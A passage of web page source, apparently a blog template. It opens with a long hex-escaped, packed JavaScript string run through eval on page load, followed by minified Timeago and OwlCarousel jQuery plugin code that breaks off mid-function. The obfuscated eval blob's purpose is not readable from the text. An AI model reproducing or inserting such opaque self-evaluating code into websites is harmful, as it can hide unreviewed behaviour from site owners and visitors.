c\x71\x5c\x5c\x67\x5c\x5c\x66\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x79\x5c\x5c\x72\x5c\x5c\x6f\x5c\x5c\x67\x5c\x5c\x6f\x5c\x5c\x39\x5c\x5c\x79\x5c\x5c\x72\x5c\x5c\x6f\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x46\x5c\x5c\x6c\x5c\x5c\x4b\x5c\x5c\x66\x5c\x5c\x39\x5c\x5c\x79\x5c\x5c\x74\x5c\x5c\x6d\x5c\x5c\x46\x5c\x5c\x66\x5c\x5c\x6d\x5c\x5c\x74\x5c\x5c\x72\x5c\x5c\x39\x5c\x5c\x6e\x5c\x5c\x72\x5c\x5c\x7a\x5c\x5c\x6c\x5c\x5c\x67\x5c\x5c\x6d\x5c\x5c\x72\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x72\x5c\x5c\x45\x5c\x5c\x67\x5c\x5c\x66\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x55\x5c\x5c\x4d\x5c\x5c\x4f\x5c\x5c\x39\x5c\x5c\x46\x5c\x5c\x6c\x5c\x5c\x4c\x5c\x5c\x39\x5c\x5c\x74\x5c\x5c\x66\x5c\x5c\x6f\x5c\x5c\x45\x5c\x5c\x6e\x5c\x5c\x67\x5c\x5c\x6f\x5c\x5c\x39\x5c\x5c\x67\x5c\x5c\x52\x5c\x5c\x79\x5c\x5c\x66\x5c\x5c\x39\x5c\x5c\x4b\x5c\x5c\x66\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x7a\x5c\x5c\x74\x5c\x5c\x6d\x5c\x5c\x79\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x6c\x5c\x5c\x59\x5c\x5c\x6c\x5c\x5c\x4c\x5c\x5c\x39\x5c\x5c\x43\x5c\x5c\x66\x5c\x5c\x66\x5c\x5c\x42\x5c\x5c\x6f\x5c\x5c\x39\x5c\x5c\x6c\x5c\x5c\x6e\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x59\x5c\x5c\x6f\x5c\x5c\x72\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x45\x5c\x5c\x6e\x5c\x5c\x6e\x5c\x5c\x39\x5c\x5c\x31\x31\x5c\x5c\x6e\x5c\x5c\x72\x5c\x5c\x4b\x5c\x5c\x4b\x5c\x5c\x66\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x43\x5c\x5c\x43\x5c\x5c\x43\x5c\x5c\x39\x5c\x5c\x79\x5c\x5c\x6c\x5c\x5c\x74\x5c\x5c\x66\x5c\x5c\x71\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x6c\x5c\x5c\x42\x5c\x5c\x42\x5c\x5c\x31\x35\x5c\x5c\x6e\x5c\x5c\x6c\x5c\x5c\x6f\x5c\x5c\x6f\x5c\x5c\x39\x5c\x5c\x4a\x5c\x5c\x6c\x5c\x5c\x6f\x5c\x5c\x31\x6c\x5c\x5c\x45\x5c\x5c\x48\x5c\x5c\x39\x5c\x5c\x58\x5c\x5c\x6d\x5c\x5c\x6f\x5c\x5c\x6d\x5c\x5c\x48\x5c\x5c\x6d\x5c\x5c\x6e\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x52\x5c\x5c\x39\x5c\x5c\x58\x5c\x5c\x6d\x5c\x5c\x6f\x5c\x5c\x6d\x5c\x5c\x48\x5c\x5c\x6e\x5c\x5c\x66\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x45\x5c\x5c\x48\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x71\x5c\x5c\x71\x5c\x5c\x66\x5c\x5c\x74\x5c\x5c\x31\x63\x5c\x5c\x31\x61\x5c\x5c\x31\x67\x5c\x5c\x31\x39\x5c\x5c\x39\x5c\x5c\x4b\x5c\x5c\x6d\x5c\x5c\x39\x5c\x5c\x72\x5c\x5c\x79\x5c\x5c\x6c\x5c\x5c\x7a\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x52\x5c\x5c\x39\x5c\x5c\x7a\x5c\x5c\x72\x5c\x5c\x6e\x5c\x5c\x72\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x54\x5c\x5c\x6d\x5c\x5c\x42\x5c\x5c\x4b\x5c\x5c\x66\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x6e\x5c\x5c\x6d\x5c\x5c\x42\x5c\x5c\x66\x5c\x5c\x31\x75\x5c\x5c\x79\x5c\x5c\x39\x5c\x5c\x31\x61\x5c\x5c\x66\x5c\x5c\x46\x5c\x5c\x79\x5c\x5c\x6e\x5c\x5c\x6c\x5c\x5c\x67\x5c\x5c\x66\x5c\x5c\x6f\x5c\x5c\x39\x5c\x5c\x42\x5c\x5c\x6c\x5c\x5c\x67\x5c\x5c\x6c\x5c\x5c\x31\x61\x5c\x5c\x52\x5c\x5c\x79\x5c\x5c\x66\x5c\x5c\x39\x5c\x5c\x31\x37\x5c\x5c\x74\x5c\x5c\x66\x5c\x5c\x66\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x71\x5c\x5c\x6e\x5c\x5c\x6d\x5c\x5c\x71\x5c\x5c\x66\x5c\x5c\x39\x5c\x5c\x43\x5c\x5c\x72\x5c\x5c\x71\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x6d\x5c\x5c\x71\x5c\x5c\x4a\x5c\x5c\x66\x5c\x5c\x74\x5c\x5c\x6d\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x6c\x5c\x5c\x58\x5c\x5c\x63\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x6e\x5c\x5c\x6d\x5c\x5c\x42\x5c\x5c\x66\x5c\x5c\x31\x36\x5c\x5c\x72\x5c\x5c\x54\x5c\x5c\x71\x5c\x5c\x39\x5c\x5c\x42\x5c\x5c\x72\x5c\x5c\x43\x5c\x5c\x72\x5c\x5c\x6e\x5c\x5c\x6e\x5c\x5c\x72\x5c\x5c\x54\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x45\x5c\x5c\x7a\x5c\x5c\x7a\x5c\x5c\x66\x5c\x5c\x6f\x5c\x5c\x6f\x5c\x5c\x39\x5c\x5c\x31\x76\x5c\x5c\x4e\x5c\x5c\x31\x34\x5c\x5c\x67\x5c\x5c\x59\x5c\x5c\x4d\x5c\x5c\x31\x63\x5c\x5c\x31\x37\x5c\x5c\x31\x31\x5c\x5c\x31\x37\x5c\x5c\x31\x66\x5c\x5c\x39\x5c\x5c\x31\x36\x5c\x5c\x31\x77\x5c\x5c\x31\x6a\x5c\x5c\x31\x36\x5c\x5c\x54\x5c\x5c\x6f\x5c\x5c\x39\x5c\x5c\x53\x5c\x5c\x53\x5c\x5c\x53\x5c\x5c\x53\x5c\x5c\x53\x5c\x5c\x53\x5c\x5c\x53\x5c\x5c\x53\x5c\x5c\x31\x31\x5c\x5c\x4f\x5c\x5c\x72\x5c\x5c\x39\x5c\x5c\x31\x6d\x5c\x5c\x56\x5c\x5c\x31\x38\x5c\x5c\x31\x39\x5c\x5c\x6f\x5c\x5c\x52\x5c\x5c\x31\x38\x5c\x5c\x31\x71\x5c\x5c\x31\x72\x5c\x5c\x31\x67\x5c\x5c\x4f\x5c\x5c\x39\x5c\x5c\x46\x5c\x5c\x66\x5c\x5c\x42\x5c\x5c\x6d\x5c\x5c\x6c\x5c\x5c\x39\x5c\x5c\x67\x5c\x5c\x4a\x5c\x5c\x45\x5c\x5c\x46\x5c\x5c\x48\x5c\x5c\x71\x5c\x5c\x6c\x5c\x5c\x6d\x5c\x5c\x6e\x5c\x5c\x39\x5c\x5c\x66\x5c\x5c\x53\x5c\x5c\x66\x5c\x5c\x31\x38\x5c\x5c\x39\x5c\x5c\x59\x5c\x5c\x6f\x5c\x5c\x72\x5c\x5c\x71\x5c\x5c\x79\x5c\x5c\x39\x5c\x5c\x7a\x5c\x5c\x72\x5c\x5c\x58\x5c\x5c\x66\x5c\x5c\x74\x5c\x5c\x39\x5c\x5c\x31\x78\x5c\x5c\x6c\x5c\x5c\x52\x5c\x5c\x6b\x5c\x5c\x67\x5c\x5c\x4a\x5c\x5c\x66\x5c\x5c\x46\x5c\x5c\x66\x5c\x5c\x6f\x5c\x5c\x39\x5c\x5c\x48\x5c\x5c\x79\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x74\x5c\x5c\x7a\x5c\x5c\x39\x5c\x5c\x43\x5c\x5c\x6d\x5c\x5c\x74\x5c\x5c\x6f\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x48\x5c\x5c\x6e\x5c\x5c\x72\x5c\x5c\x4b\x5c\x5c\x6f\x5c\x5c\x79\x5c\x5c\x72\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x55\x5c\x5c\x4f\x5c\x5c\x4f\x5c\x5c\x39\x5c\x5c\x6f\x5c\x5c\x63\x5c\x5c\x55\x5c\x5c\x4f\x5c\x5c\x4f\x5c\x5c\x39\x5c\x5c\x72\x5c\x5c\x71\x5c\x5c\x6e\x5c\x5c\x72\x5c\x5c\x6c\x5c\x5c\x42\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x67\x5c\x5c\x4a\x5c\x5c\x39\x5c\x5c\x6c\x5c\x5c\x6e\x5c\x5c\x67\x5c\x5c\x66\x5c\x5c\x74\x5c\x5c\x71\x5c\x5c\x6c\x5c\x5c\x67\x5c\x5c\x66\x5c\x5c\x39\x5c\x5c\x4b\x5c\x5c\x66\x5c\x5c\x67\x5c\x5c\x31\x69\x5c\x5c\x6e\x5c\x5c\x66\x5c\x5c\x46\x5c\x5c\x66\x5c\x5c\x71\x5c\x5c\x67\x5c\x5c\x31\x31\x5c\x5c\x52\x5c\x5c\x31\x66\x5c\x5c\x42\x5c\x5c\x39\x5c\x5c\x74\x5c\x5c\x66\x5c\x5c\x79\x5c\x5c\x66\x5c\x5c\x6c\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x48\x5c\x5c\x74\x5c\x5c\x66\x5c\x5c\x6c\x5c\x5c\x4e\x5c\x5c\x39\x5c\x5c\x7a\x5c\x5c\x72\x5c\x5c\x71\x5c\x5c\x67\x5c\x5c\x66\x5c\x5c\x71\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x71\x5c\x5c\x72\x5c\x5c\x39\x5c\x5c\x46\x5c\x5c\x52\x5c\x5c\x7a\x5c\x5c\x72\x5c\x5c\x71\x5c\x5c\x67\x5c\x5c\x66\x5c\x5c\x71\x5c\x5c\x67\x5c\x5c\x39\x5c\x5c\x79\x5c\x5c\x71\x5c\x5c\x4b\x5c\x5c\x39\x5c\x5c\x4a\x5c\x5c\x67\x5c\x5c\x67\x5c\x5c\x79\x5c\x5c\x6f\x22\x2c\x22\x22\x2c\x22\x5c\x5c\x43\x5c\x5c\x74\x5c\x5c\x72\x5c\x5c\x46\x5c\x5c\x31\x35\x5c\x5c\x4a\x5c\x5c\x6c\x5c\x5c\x74\x5c\x5c\x31\x35\x5c\x5c\x72\x5c\x5c\x42\x5c\x5c\x66\x22\x2c\x22\x5c\x5c\x31\x4f\x5c\x5c\x48\x22\x2c\x22\x5c\x5c\x4b\x22\x2c\x22\x5c\x5c\x74\x5c\x5c\x66\x5c\x5c\x79\x5c\x5c\x6e\x5c\x5c\x6c\x5c\x5c\x7a\x5c\x5c\x66\x22\x5d\x3b\x31\x57\x28\x31\x45\x28\x31\x41\x2c\x31\x7a\x2c\x31\x30\x2c\x31\x43\x2c\x31\x79\x2c\x31\x56\x29\x7b\x31\x79\x3d\x31\x45\x28\x31\x30\x29\x7b\x31\x44\x28\x31\x30\x3c\x31\x7a\x3f\x31\x33\x5b\x34\x5d\x3a\x31\x79\x28\x31\x55\x28\x31\x30\x2f\x31\x7a\x29\x29\x29\x2b\x28\x28\x31\x30\x3d\x31\x30\x25\x31\x7a\x29\x3e\x31\x54\x3f\x31\x53\x5b\x31\x33\x5b\x35\x5d\x5d\x28\x31\x30\x2b\x31\x52\x29\x3a\x31\x30\x2e\x31\x49\x28\x31\x50\x29\x29\x7d\x3b\x31\x51\x28\x31\x30\x2d\x2d\x29\x7b\x31\x4e\x28\x31\x43\x5b\x31\x30\x5d\x29\x7b\x31\x41\x3d\x31\x41\x5b\x31\x33\x5b\x38\x5d\x5d\x28\x31\x4d\x20\x31\x4c\x28\x31\x33\x5b\x36\x5d\x2b\x31\x79\x28\x31\x30\x29\x2b\x31\x33\x5b\x36\x5d\x2c\x31\x33\x5b\x37\x5d\x29\x2c\x31\x43\x5b\x31\x30\x5d\x29\x7d\x7d\x3b\x31\x44\x20\x31\x41\x7d\x28\x31\x33\x5b\x30\x5d\x2c\x31\x4b\x2c\x31\x4a\x2c\x31\x33\x5b\x33\x5d\x5b\x31\x33\x5b\x32\x5d\x5d\x28\x31\x33\x5b\x31\x5d\x29\x29\x29\x27\x2c\x36\x32\x2c\x31\x32\x31\x2c\x27\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x7c\x78\x37\x43\x7c\x78\x32\x32\x7c\x78\x32\x45\x7c\x78\x33\x31\x7c\x78\x32\x38\x7c\x78\x32\x39\x7c\x78\x36\x35\x7c\x78\x37\x34\x7c\x78\x32\x30\x7c\x78\x33\x44\x7c\x78\x32\x37\x7c\x78\x33\x32\x7c\x78\x36\x31\x7c\x78\x36\x39\x7c\x78\x36\x43\x7c\x78\x37\x33\x7c\x78\x32\x43\x7c\x78\x36\x45\x7c\x78\x36\x46\x7c\x78\x32\x46\x7c\x78\x37\x32\x7c\x78\x33\x42\x7c\x78\x32\x42\x7c\x78\x32\x44\x7c\x78\x33\x45\x7c\x78\x37\x30\x7c\x78\x36\x33\x7c\x78\x33\x43\x7c\x78\x36\x34\x7c\x78\x36\x36\x7c\x78\x32\x34\x7c\x78\x37\x35\x7c\x78\x36\x44\x7c\x78\x37\x44\x7c\x78\x36\x32\x7c\x78\x37\x42\x7c\x78\x36\x38\x7c\x78\x36\x37\x7c\x78\x37\x38\x7c\x78\x33\x34\x7c\x78\x36\x42\x7c\x78\x33\x30\x7c\x78\x33\x41\x7c\x78\x37\x41\x7c\x78\x37\x39\x7c\x78\x34\x31\x7c\x78\x37\x37\x7c\x78\x33\x36\x7c\x78\x33\x35\x7c\x78\x33\x37\x7c\x78\x37\x36\x7c\x78\x36\x41\x7c\x78\x33\x38\x7c\x5f\x30\x78\x34\x38\x33\x61\x78\x33\x7c\x78\x34\x32\x7c\x78\x33\x39\x7c\x5f\x30\x78\x34\x62\x36\x66\x7c\x78\x37\x31\x7c\x78\x34\x33\x7c\x78\x34\x34\x7c\x78\x34\x36\x7c\x78\x34\x46\x7c\x78\x34\x43\x7c\x78\x35\x34\x7c\x78\x32\x31\x7c\x78\x34\x38\x7c\x78\x35\x44\x7c\x78\x35\x42\x7c\x78\x34\x39\x7c\x78\x34\x44\x7c\x78\x32\x36\x7c\x78\x34\x35\x7c\x78\x34\x41\x7c\x78\x32\x33\x7c\x78\x35\x33\x7c\x78\x35\x31\x7c\x78\x35\x30\x7c\x78\x33\x33\x7c\x78\x34\x37\x7c\x78\x34\x45\x7c\x78\x35\x38\x7c\x78\x35\x32\x7c\x78\x34\x42\x7c\x78\x35\x35\x7c\x78\x35\x36\x7c\x78\x35\x39\x7c\x78\x35\x37\x7c\x5f\x30\x78\x34\x38\x33\x61\x78\x35\x7c\x5f\x30\x78\x34\x38\x33\x61\x78\x32\x7c\x5f\x30\x78\x34\x38\x33\x61\x78\x31\x7c\x78\x35\x41\x7c\x5f\x30\x78\x34\x38\x33\x61\x78\x34\x7c\x72\x65\x74\x75\x72\x6e\x7c\x66\x75\x6e\x63\x74\x69\x6f\x6e\x7c\x78\x33\x46\x7c\x76\x61\x72\x7c\x78\x35\x46\x7c\x74\x6f\x53\x74\x72\x69\x6e\x67\x7c\x31\x36\x31\x7c\x36\x32\x7c\x52\x65\x67\x45\x78\x70\x7c\x6e\x65\x77\x7c\x69\x66\x7c\x78\x35\x43\x7c\x33\x36\x7c\x77\x68\x69\x6c\x65\x7c\x32\x39\x7c\x53\x74\x72\x69\x6e\x67\x7c\x33\x35\x7c\x70\x61\x72\x73\x65\x49\x6e\x74\x7c\x5f\x30\x78\x34\x38\x33\x61\x78\x36\x7c\x65\x76\x61\x6c\x27\x2e\x73\x70\x6c\x69\x74\x28\x27\x7c\x27\x29\x2c\x30\x2c\x7b\x7d\x29\x29\x0a";eval(_Rf8ZyH);
4075 //]]>
4076</script>
4077<script>
4078//<![CDATA[
4079// Timeago jQuery plugin ~ URL: http://timeago.yarp.com
4080(function(e){if(typeof define==="function"&&define.amd){define(["jquery"],e)}else{e(jQuery)}})(function(e){function r(){var n=i(this);var r=t.settings;if(!isNaN(n.datetime)){if(r.cutoff==0||Math.abs(o(n.datetime))<r.cutoff){e(this).text(s(n.datetime))}}return this}function i(n){n=e(n);if(!n.data("timeago")){n.data("timeago",{datetime:t.datetime(n)});var r=e.trim(n.text());if(t.settings.localeTitle){n.attr("title",n.data("timeago").datetime.toLocaleString())}else if(r.length>0&&!(t.isTime(n)&&n.attr("title"))){n.attr("title",r)}}return n.data("timeago")}function s(e){return t.inWords(o(e))}function o(e){return(new Date).getTime()-e.getTime()}e.timeago=function(t){if(t instanceof Date){return s(t)}else if(typeof t==="string"){return s(e.timeago.parse(t))}else if(typeof t==="number"){return s(new Date(t))}else{return s(e.timeago.datetime(t))}};var t=e.timeago;e.extend(e.timeago,{settings:{refreshMillis:6e4,allowPast:true,allowFuture:false,localeTitle:false,cutoff:0,strings:{prefixAgo:null,prefixFromNow:null,suffixAgo:"ago",suffixFromNow:"from now",inPast:"in a moment",seconds:"a few seconds",minute:"%d minute",minutes:"%d mins",hour:"%d hour",hours:"%d hrs",day:"%d day",days:"%d days",month:"month",months:"%d months",year:"%d year",years:"%d years",wordSeparator:" ",numbers:[]}},inWords:function(t){function l(r,i){var s=e.isFunction(r)?r(i,t):r;var o=n.numbers&&n.numbers[i]||i;return s.replace(/%d/i,o)}if(!this.settings.allowPast&&!this.settings.allowFuture){throw"timeago allowPast and allowFuture settings can not both be set to false."}var n=this.settings.strings;var r=n.prefixAgo;var i=n.suffixAgo;if(this.settings.allowFuture){if(t<0){r=n.prefixFromNow;i=n.suffixFromNow}}if(!this.settings.allowPast&&t>=0){return this.settings.strings.inPast}var s=Math.abs(t)/1e3;var o=s/60;var u=o/60;var a=u/24;var f=a/365;var c=s<45&&l(n.seconds,Math.round(s))||s<90&&l(n.minute,1)||o<45&&l(n.minutes,Math.round(o))||o<90&&l(n.hour,1)||u<24&&l(n.hours,Math.round(u))||u<42&&l(n.day,1)||a<30&&l(n.days,Math.round(a))||a<45&&l(n.month,1)||a<365&&l(n.months,Math.round(a/30))||f<1.5&&l(n.year,1)||l(n.years,Math.round(f));var h=n.wordSeparator||"";if(n.wordSeparator===undefined){h=" "}return e.trim([r,c,i].join(h))},parse:function(t){var n=e.trim(t);n=n.replace(/\.\d+/,"");n=n.replace(/-/,"/").replace(/-/,"/");n=n.replace(/T/," ").replace(/Z/," UTC");n=n.replace(/([\+\-]\d\d)\:?(\d\d)/," $1$2");n=n.replace(/([\+\-]\d\d)$/," $100");return new Date(n)},datetime:function(n){var r=t.isTime(n)?e(n).attr("datetime"):e(n).attr("title");return t.parse(r)},isTime:function(t){return e(t).get(0).tagName.toLowerCase()==="time"}});var n={init:function(){var n=e.proxy(r,this);n();var i=t.settings;if(i.refreshMillis>0){this._timeagoInterval=setInterval(n,i.refreshMillis)}},update:function(n){var i=t.parse(n);e(this).data("timeago",{datetime:i});if(t.settings.localeTitle)e(this).attr("title",i.toLocaleString());r.apply(this)},updateFromDOM:function(){e(this).data("timeago",{datetime:t.parse(t.isTime(this)?e(this).attr("datetime"):e(this).attr("title"))});r.apply(this)},dispose:function(){if(this._timeagoInterval){window.clearInterval(this._timeagoInterval);this._timeagoInterval=null}}};e.fn.timeago=function(e,t){var r=e?n[e]:n.init;if(!r){throw new Error("Unknown function name '"+e+"' for timeago")}this.each(function(){r.call(this,t)});return this};document.createElement("abbr");document.createElement("time")});
4081
4082// jQuery OwlCarousel v1.31 - http://www.owlgraphic.com/owlcarousel
4083"function"!==typeof Object.create&&(Object.create=function(f){function g(){}g.prototype=f;return new g});
4084(function(f,g,k){var l={init:function(a,b){this.$elem=f(b);this.options=f.extend({},f.fn.owlCarousel.options,this.$elem.data(),a);this.userOptions=a;this.loadContent()},loadContent:function(){function a(a){var d,e="";if("function"===typeof b.options.jsonSuccess)b.options.jsonSuccess.apply(this,[a]);else{for(d in a.owl)a.owl.hasOwnProperty(d)&&(e+=a.owl[d].item);b.$elem.html(e)}b.logIn()}var b=this,e;"function"===typeof b.options.beforeInit&&b.options.beforeInit.apply(this,[b.$elem]);"string"===typeof b.options.jsonPath?
4085(e=b.options.jsonPath,f.getJSON(e,a)):b.logIn()},logIn:function(){this.$elem.data("owl-originalStyles",this.$elem.attr("style"));this.$elem.data("owl-originalClasses",this.$elem.attr("class"));this.$elem.css({opacity:0});this.orignalItems=this.options.items;this.checkBrowser();this.wrapperWidth=0;this.checkVisible=null;this.setVars()},setVars:function(){if(0===this.$elem.children().length)return!1;this.baseClass();this.eventTypes();this.$userItems=this.$elem.children();this.itemsAmount=this.$userItems.length;
4086this.wrapItems();this.$owlItems=this.$elem.find(".owl-item");this.$owlWrapper=this.$elem.find(".owl-wrapper");this.playDirection="next";this.prevItem=0;this.prevArr=[0];this.currentItem=0;this.customEvents();this.onStartup()},onStartup:function(){this.updateItems();this.calculateAll();this.buildControls();this.updateControls();this.response();this.moveEvents();this.stopOnHover();this.owlStatus();!1!==this.options.transitionStyle&&this.transitionTypes(this.options.transitionStyle);!0===this.options.autoPlay&&
4087(this.options.autoPlay=5E3);this.play();this.$elem.find(".owl-wrapper").css("display","block");this.$elem.is(":visible")?this.$elem.css("opacity",1):this.watchVisibility();this.onstartup=!1;this.eachMoveUpdate();"function"===typeof this.options.afterInit&&this.options.afterInit.apply(this,[this.$elem])},eachMoveUpdate:function(){!0===this.options.lazyLoad&&this.lazyLoad();!0===this.options.autoHeight&&this.autoHeight();this.onVisibleItems();"function"===typeof this.options.afterAction&&this.options.afterAction.apply(this,
4088[this.$elem])},updateVars:function(){"function"===typeof this.options.beforeUpdate&&this.options.beforeUpdate.apply(this,[this.$elem]);this.watchVisibility();this.updateItems();this.calculateAll();this.updatePosition();this.updateControls();this.eachMoveUpdate();"function"===typeof this.options.afterUpdate&&this.options.afterUpdate.apply(this,[this.$elem])},reload:function(){var a=this;g.setTimeout(function(){a.updateVars()},0)},watchVisibility:function(){var a=this;if(!1===a.$elem.is(":visible"))a.$elem.css({opacity:0}),
4089g.clearInterval(a.autoPlayInterval),g.clearInterval(a.checkVisible);else return!1;a.checkVisible=g.setInterval(function(){a.$elem.is(":visible")&&(a.reload(),a.$elem.animate({opacity:1},200),g.clearInterval(a.checkVisible))},500)},wrapItems:function(){this.$userItems.wrapAll('<div class="owl-wrapper">').wrap('<div class="owl-item"></div>');this.$elem.find(".owl-wrapper").wrap('<div class="owl-wrapper-outer">');this.wrapperOuter=this.$elem.find(".owl-wrapper-outer");this.$elem.css("display","block")},
4090baseClass:function(){var a=this.$elem.hasClass(this.options.baseClass),b=this.$elem.hasClass(this.options.theme);a||this.$elem.addClass(this.options.baseClass);b||this.$elem.addClass(this.options.theme)},updateItems:function(){var a,b;if(!1===this.options.responsive)return!1;if(!0===this.options.singleItem)return this.options.items=this.orignalItems=1,this.options.itemsCustom=!1,this.options.itemsDesktop=!1,this.options.itemsDesktopSmall=!1,this.options.itemsTablet=!1,this.options.itemsTabletSmall=
4091!1,this.options.itemsMobile=!1;a=f(this.options.responsiveBaseWidth).width();a>(this.options.itemsDesktop[0]||this.orignalItems)&&(this.options.items=this.orignalItems);if(!1!==this.options.itemsCustom)for(this.options.itemsCustom.sort(function(a,b){return a[0]-b[0]}),b=0;b<this.options.itemsCustom.length;b+=1)this.options.itemsCustom[b][0]<=a&&(this.options.items=this.options.itemsCustom[b][1]);else a<=this.options.itemsDesktop[0]&&!1!==this.options.itemsDesktop&&(this.options.items=this.options.itemsDesktop[1]),
4092a<=this.options.itemsDesktopSmall[0]&&!1!==this.options.itemsDesktopSmall&&(this.options.items=this.options.itemsDesktopSmall[1]),a<=this.options.itemsTablet[0]&&!1!==this.options.itemsTablet&&(this.options.items=this.options.itemsTablet[1]),a<=this.options.itemsTabletSmall[0]&&!1!==this.options.itemsTabletSmall&&(this.options.items=this.options.itemsTabletSmall[1]),a<=this.options.itemsMobile[0]&&!1!==this.options.itemsMobile&&(this.options.items=this.options.itemsMobile[1]);this.options.items>this.itemsAmount&&
4093!0===this.options.itemsScaleUp&&(this.options.items=this.itemsAmount)},response:function(){var a=this,b,e;if(!0!==a.options.responsive)return!1;e=f(g).width();a.resizer=function(){f(g).width()!==e&&(!1!==a.options.autoPlay&&g.clearInterval(a.autoPlayInterval),g.clearTimeout(b),b=g.setTimeout(function(){e=f(g).width();a.updateVars()},a.options.responsiveRefreshRate))};f(g).resize(a.resizer)},updatePosition:function(){this.jumpTo(this.currentItem);!1!==this.options.autoPlay&&this.checkAp()},appendItemsSizes:function(){var a=
4094this,b=0,e=a.itemsAmount-a.options.items;a.$owlItems.each(function(c){var d=f(this);d.css({width:a.itemWidth}).data("owl-item",Number(c));if(0===c%a.options.items||c===e)c>e||(b+=1);d.data("owl-roundPages",b)})},appendWrapperSizes:function(){this.$owlWrapper.css({width:this.$owlItems.length*this.itemWidth*2,left:0});this.appendItemsSizes()},calculateAll:function(){this.calculateWidth();this.appendWrapperSizes();this.loops();this.max()},calculateWidth:function(){this.itemWidth=Math.round(this.$elem.width()/
4095this.options.items)},max:function(){var a=-1*(this.itemsAmount*this.itemWidth-this.options.items*this.itemWidth);this.options.items>this.itemsAmount?this.maximumPixels=a=this.maximumItem=0:(this.maximumItem=this.itemsAmount-this.options.items,this.maximumPixels=a);return a},min:function(){return 0},loops:function(){var a=0,b=0,e,c;this.positionsInArray=[0];this.pagesInArray=[];for(e=0;e<this.itemsAmount;e+=1)b+=this.itemWidth,this.positionsInArray.push(-b),!0===this.options.scrollPerPage&&(c=f(this.$owlItems[e]),
4096c=c.data("owl-roundPages"),c!==a&&(this.pagesInArray[a]=this.positionsInArray[e],a=c))},buildControls:function(){if(!0===this.options.navigation||!0===this.options.pagination)this.owlControls=f('<div class="owl-controls"/>').toggleClass("clickable",!this.browser.isTouch).appendTo(this.$elem);!0===this.options.pagination&&this.buildPagination();!0===this.options.navigation&&this.buildButtons()},buildButtons:function(){var a=this,b=f('<div class="owl-buttons"/>');a.owlControls.append(b);a.buttonPrev=
4097f("<div/>",{"class":"owl-prev",html:a.options.navigationText[0]||""});a.buttonNext=f("<div/>",{"class":"owl-next",html:a.options.navigationText[1]||""});b.append(a.buttonPrev).append(a.buttonNext);b.on("touchstart.owlControls mousedown.owlControls",'div[class^="owl"]',function(a){a.preventDefault()});b.on("touchend.owlControls mouseup.owlControls",'div[class^="owl"]',function(b){b.preventDefault();f(this).hasClass("owl-next")?a.next():a.prev()})},buildPagination:function(){var a=this;a.paginationWrapper=
4098f('<div class="owl-pagination"/>');a.owlControls.append(a.paginationWrapper);a.paginationWrapper.on("touchend.owlControls mouseup.owlControls",".owl-page",function(b){b.preventDefault();Number(f(this).data("owl-page"))!==a.currentItem&&a.goTo(Number(f(this).data("owl-page")),!0)})},updatePagination:function(){var a,b,e,c,d,g;if(!1===this.options.pagination)return!1;this.paginationWrapper.html("");a=0;b=this.itemsAmount-this.itemsAmount%this.options.items;for(c=0;c<this.itemsAmount;c+=1)0===c%this.options.items&&
4099(a+=1,b===c&&(e=this.itemsAmount-this.options.items),d=f("<div/>",{"class":"owl-page"}),g=f("<span></span>",{text:!0===this.options.paginationNumbers?a:"","class":!0===this.options.paginationNumbers?"owl-numbers":""}),d.append(g),d.data("owl-page",b===c?e:c),d.data("owl-roundPages",a),this.paginationWrapper.append(d));this.checkPagination()},checkPagination:function(){var a=this;if(!1===a.options.pagination)return!1;a.paginationWrapper.find(".owl-page").each(function(){f(this).data("owl-roundPages")===
4100f(a.$owlItems[a.currentItem]).data("owl-roundPages")&&(a.paginationWrapper.find(".owl-page").removeClass("active"),f(this).addClass("active"))})},checkNavigation:function(){if(!1===this.options.navigation)return!1;!1===this.options.rewindNav&&(0===this.currentItem&&0===this.maximumItem?(this.buttonPrev.addClass("disabled"),this.buttonNext.addClass("disabled")):0===this.currentItem&&0!==this.maximumItem?(this.buttonPrev.addClass("disabled"),this.buttonNext.removeClass("disabled")):this.currentItem===
4101this.maximumItem?(this.buttonPrev.removeClass("disabled"),this.buttonNext.addClass("disabled")):0!==this.currentItem&&this.currentItem!==this.maximumItem&&(this.buttonPrev.removeClass("disabled"),this.buttonNext.removeClass("disabled")))},updateControls:function(){this.updatePagination();this.checkNavigation();this.owlControls&&(this.options.items>=this.itemsAmount?this.owlControls.hide():this.owlControls.show())},destroyControls:function(){this.owlControls&&this.owlControls.remove()},next:function(a){if(this.isTransition)return!1;
